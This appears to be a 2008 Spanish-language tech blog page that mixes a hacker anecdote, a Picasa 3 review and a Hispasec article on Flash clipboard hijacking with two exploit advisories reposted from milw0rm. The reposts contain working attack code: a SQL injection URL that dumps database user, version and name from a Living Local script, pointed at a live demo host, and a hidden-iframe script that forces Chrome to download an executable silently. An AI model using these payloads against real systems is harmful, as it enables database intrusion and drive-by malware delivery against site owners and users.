El programa que utilizaba era muy sencillo, lo que hacía era digitar números telefónicos al azar hasta que uno de ellos obtenía respuesta de un módem.

La intervención del banco consistió en cambiar las contraseñas del sistema, con el objeto que los técnicos no pudieran ingresar al mismo.

Tal vez los hermanos Wachowski se inspiraron en él para crear el personaje de Keanu Reeves.

Link: MySpace Cofounder Tom Anderson Was A Real Life “WarGames” Hacker in 1980s (TechCrunch)

Obtenido de: fayerwayer.com

jueves, 4 de septiembre de 2008

Picasa 3 3.0.0 (57.19,0) Beta

Picasa es uno de los programas más interesantes para los aficionados a la fotografía digital porque soluciona eficazmente las necesidades más habituales de edición y retoque.

Ahora, con esta primera entrega beta de Picasa 3 se añaden nuevas funciones y se mejoran las que ya ofrecía.

Entre las nuevas funciones de Picasa 3 destacan dos: el visualizador de imágenes, espectacular y totalmente independiente de Picasa; y la función para crear vídeos con tus fotos.

También merece especial mención que ahora se han incluido pestañas, sí, como la de los navegadores, para poder realizar varias tareas diferentes sin perder la anterior.

Una de las funciones que ha ganado más con el paso de la versión 2 a la 3 ha sido la herramienta para crear collages. Ahora tiene más tipos de collages y muchas más opciones para crearlos a tu gusto.

Picasa 3 sigue siendo una magnífica utilidad para retocar y optimizar tus fotos, organizarlas y crear todo tipo de cosas con ellas.

Haga clic aqui para descargar picasa.

En Busca De Blogger Cinéfilo, Ebay, Apple Y Un Poco De G

Importante: se busca blogger, El verdor de eBay, Ahora sí: noticias de Apple, Nueva sección de compras online: batmovil, timbre geek, gunclock

miércoles, 3 de septiembre de 2008

Living Local Website (listtest.php r) SQL Injection Vulnerability

|___________________________________________________|
|
| Living Local (listtest.php r) Remote SQL Injection Vulnerability
|
|___________________________________________________
|---------------------Hussin X----------------------|
|
| Author: Hussin X
|
| Home : WwW.Hussin-X.CoM | www.tryag.cc/cc
|
| email: darkangel_g85[at]Yahoo[DoT]com
|
|
|___________________________________________________
| |
|
| script : http://www.ezonescripts.com/scripts/sls/livinglocal.php
|
|___________________________________________________|

Exploit:




www.[target].com/Script/listtest.php?r=-20+union+select+1,concat_ws(0x3a,user(),version(),database())--






L!VE DEMO:


http://www.ezonescripts.com/productdemos/LivingLocal/listtest.php?r=-20+union+select+1,concat_ws(0x3a,user(),version(),database())--




____________________________( Greetz )_________________________________
|
| All members of the Forum WwW.Hussin-X.CoM | WwW.TrYaG.CC
|
| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr | kadmiwe
|
| jiko | FAHD | Iraqihack | mos_chori | str0ke | Ghost Hacker
|______________________________________________________________________


Im IRAQi

# milw0rm.com [2008-09-03]

Google Chrome Browser 0.2.149.27 Automatic File Download Exploit

***************************************************************************
Author: nerex
E-mail: nerex[at]live[dot]com

Google's new Web browser (Chrome) allows files (e.g., executables) to be automatically
downloaded to the user's computer without any user prompt.

This proof-of-concept was created for educational purposes only.
Use the code it at your own risk.
The author will not be responsible for any damages.

Tested on Windows Vista SP1 and Windows XP SP3 with Google Chrome (BETA)
**************************************************************************
<script>
document.write('<iframe src="http://www.example.com/hello.exe" frameborder="0" width="0" height="0">');
</script>

# milw0rm.com [2008-09-03]

El "secuestro" del portapapeles

Desde finales del mes pasado, muchos usuarios están detectando un comportamiento extraño en su portapapeles. A la hora de copiar y pegar cualquier dato, encuentran que siempre aparece almacenada en este memoria una misma dirección de Internet, que no recuerdan haber copiado nunca. Copian algún dato en su "clipboard", y cuando van a pegarlo esa información ya ha sido modificada y en su lugar se memoriza una URL. No parecen estar infectados por malware, en cuanto se visita alguna web el problema reaparece... es solo que su portapapeles ha sido secuestrado.

Según se admite en una nota publicada por el Equipo de Respuesta ante Incidentes de Seguridad en Productos de Adobe (Adobe Product Security Incident Response Team) el problema está causado por una funcionalidad en Flash Player que podría ser aprovechada por un atacante remoto para "secuestrar" el portapapeles del sistema, forzando a que devuelva siempre una misma cadena.

El problema se debe a que por medio de la función "setClipboard" de ActionScript (el lenguaje de programación de Adobe Flash) se puede modificar (pero no acceder) el contenido del portapapeles. La descripción se puede leer en la documentación de Adobe Flash citada a continuación: "El método System.setClipboard() permite a un archivo SWF reemplazar el contenido del portapapeles con una cadena de caracteres en texto claro. Esto no supone un riesgo de seguridad. Para proteger contra los riesgos que supone que contraseñas y otra información sensible sea cortada o copiada de los portapapeles, el método "getClipboard" de lectura desde el portapapeles no existe".

Si se crea un archivo SWF modificado que invoque a esta función repetidamente en bucle, cada cierto tiempo se actualizará el contenido del portapapeles para forzar que contenga la cadena elegida. Independientemente de la aplicación con la que se trabaje, siempre que se intente copiar y pegar algún dato, dará como resultado la misma cadena una y otra vez mientras el flash esté activo en una web que está siendo visitada.

El ataque (más molesto que peligroso) se está usando para secuestrar el portapapeles, pegando una URL que lleva a una página de un falso antivirus que resulta ser malware. En el caso concreto detectado en los últimos días, el código ActionScript malicioso venía incrustado en anuncios flash alojados en sitios legítimos que tienen un gran tráfico de visitas diarias, como Newsweek, Digg y MSNBC.

Este fallo no es realmente grave. Desde hace muchos años revive de vez en cuando la polémica (es una funcionalidad vs. es una vulnerabilidad) con respecto a un problema mucho más serio: El acceso al portapapeles por parte de funciones de Internet Explorer. Aunque este ataque flash en concreto es independiente del navegador, aun hoy día la configuración por defecto de la mayoría de sistemas con Internet Explorer 6 permite de forma transparente no solo modificar sino tener acceso al portapapeles. El objeto clipboardData (incorporado en la versión 5 de Internet Explorer) admite tres métodos para interactuar con los datos del clipboard, "getData" para capturar la información, "setData" para escribir, y "clearData" para borrar. Ya en 2005 Hispasec publicó una prueba de concepto disponible en el apartado de más información.

También este ataque a través de flash recuerda al que se puso de moda hace años, lo que se dio en llamar "secuestro del navegador" que consistía en la modificación persistente de la página de inicio de Internet Explorer. Mucho malware del momento era capaz de secuestrarla con más o menos destreza. Hoy en día es una práctica en desuso.

Para "liberar" el portapapeles y que vuelva a funcionar de forma normal, tan solo hace falta cerrar la pestaña del navegador con la que se está visitando en el sitio web susceptible de contener el flash especialmente manipulado.

Aviv Raff ha desarrollado una prueba de concepto que carga de forma persistente la cadena http://www.evil.com en el portapapeles, disponible desde http://raffon.net/research/flash/cb/test.html

Fuente: http://www.hispasec.com

Etiquetas

INTERNET (459) newsweek (305) SEGURIDAD (224) software (136) HACK (86) GOOGLE (47) Hacker (46) Geek (41) hardware (36) WINDOWS (34) Hackers (31) CRACK (29) facebook (29) video (28) DESCARGA (27) videos (26) Celulares (25) MICROSOFT (22) Informatica (21) apple (19) GRATIS (18) technology (18) virus (18) exploit (17) computación (16) informatico (16) web (15) cracker (14) INALAMBRICO (13) WINDOWS 7 (13) noticias (11) MSN (10) termino (10) ACTUALIZACION (9) Gamer (9) LapTops (9) Mac (9) PASSWORD (9) WINDOWS XP (9) dns (9) firefox (9) juegos (9) FOTOS (8) cientifico (8) iphone (8) WEP (7) antivirus (7) bibliografia (7) Desencriptar (6) INFINITUM (6) wifi (6) youtube (6) Craker (5) Culiacan (5) DESMOSTRACION (5) TELEFONIA (5) gmail (5) messenger (5) DIRECTA (4) DOWNLOAD (4) ESPAÑOL (4) XBOX (4) xss (4) Glosario (3) HTML (3) WPA (3) anuncios (3) ataques (3) hosting (3) hotmail (3) Guru (2) ajax (2) wpa2 (2)